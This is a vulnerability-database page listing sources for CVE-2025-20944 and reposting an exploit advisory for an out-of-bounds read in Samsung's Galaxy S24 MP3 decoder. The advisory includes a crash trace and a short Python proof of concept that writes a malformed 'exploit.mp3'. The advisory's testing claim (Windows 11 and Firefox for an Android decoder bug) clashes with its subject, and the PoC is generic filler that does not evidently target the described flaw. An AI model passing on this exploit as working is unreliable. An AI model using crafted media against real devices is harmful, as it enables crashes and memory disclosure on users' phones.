| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-20944 | 8 Apr 202504:46 | – | circl | |
| SAMSUNG Mobile devices 安全漏洞 | 8 Apr 202500:00 | – | cnnvd | |
| CVE-2025-20944 | 8 Apr 202504:39 | – | cve | |
| CVE-2025-20944 | 8 Apr 202504:39 | – | cvelist | |
| EUVD-2025-10079 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-20944 | 8 Apr 202505:15 | – | nvd | |
| Samsung S24 MP3 Decoder Out-Of-Bounds Read | 3 Jun 202500:00 | – | packetstormnews | |
| PT-2025-15345 | 8 Apr 202500:00 | – | ptsecurity | |
| CVE-2025-20944 | 10 Apr 202505:59 | – | redhatcve | |
| CVE-2025-20944 | 8 Apr 202504:39 | – | vulnrichment |
=============================================================================================================================================
| # Title : Samsung MP3 Decoder (smp123d_joint_stereo_v1) Out-of-Bounds Read Enabling Potential ASLR Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/199582/
[+] Summary : An out‑of‑bounds read vulnerability exists in the Samsung MP3 decoder, specifically in the function smp123d_joint_stereo_v1.
The decoder fails to validate table indices during joint‑stereo processing, allowing memory outside the intended buffer to be read. This flaw can cause crashes,
inconsistent audio output, and memory disclosure behavior dependent on the process layout. As a result, the bug may enable partial ASLR bypass when a crafted MP3 file is processed on affected Samsung devices.
The issue affects the Samsung Galaxy S24 (patch level December 1, 2024) and is tracked as CVE‑2025‑20944.
#00 pc 0000000000035a1c /vendor/lib64/libsavsac.so
(smp123d_joint_stereo_v1+1436)
(BuildId: df93c19e458701b5125d755553f19288)
[+] There is no public version number for smp123d_joint_stereo_v1 because:
It is not a standalone library.
It is an internal function inside Samsung’s proprietary MP3 decoder.
Samsung does not publish version numbers for these internal codec modules.
[+] Therefore:
The vulnerable version is the MP3 decoder shipped with the Samsung Galaxy S24 series (One UI 6.x / Android 14–15).
Vulnerable Component:
Samsung MP3 Decoder — internal function: smp123d_joint_stereo_v1
Affected Version:
The decoder included in One UI 6.x (2024 firmware) on the S24 family.
[+] POC : python poc.py
import struct
def create_malformed_mp3():
header = b'\xFF\xFB\x90\x00'
malicious_data = b''
for i in range(1000):
malicious_data += struct.pack('>H', 0xFFFF)
return header + malicious_data
with open('exploit.mp3', 'wb') as f:
f.write(create_malformed_mp3())
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation